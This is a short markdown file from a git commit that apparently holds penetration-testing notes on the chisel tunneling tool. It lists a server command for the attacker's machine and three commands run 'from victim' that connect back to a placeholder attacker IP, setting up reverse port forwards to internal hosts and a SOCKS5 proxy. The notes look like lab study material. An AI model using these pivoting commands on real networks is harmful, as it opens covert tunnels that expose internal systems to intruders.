first commit

This commit is contained in:
2025-11-21 17:17:42 +01:00
commit 4cad18c2a5
285 changed files with 122106 additions and 0 deletions
+9
View File
@@ -0,0 +1,9 @@
- Start server listening on 8000:
- `./chisel server -p 8000 --reverse`
- From victim:
| Command | Notes |
|----------------------------------------------------------|--------------------------------------------------------------|
| `.\chisel client <attacker ip>:<port> R:80:127.0.0.1:80` | Listen on Kali 80, forward to localhost port 80 on client |
| `.\chisel client <attacker ip>:<port> R:4444:10.10.10.240:80` | Listen on Kali 4444, forward to 10.10.10.240 port 80 |
| `.\chisel client <attacker ip>:<port> R:socks` | Create SOCKS5 listener on 1080 on Kali, proxy through client |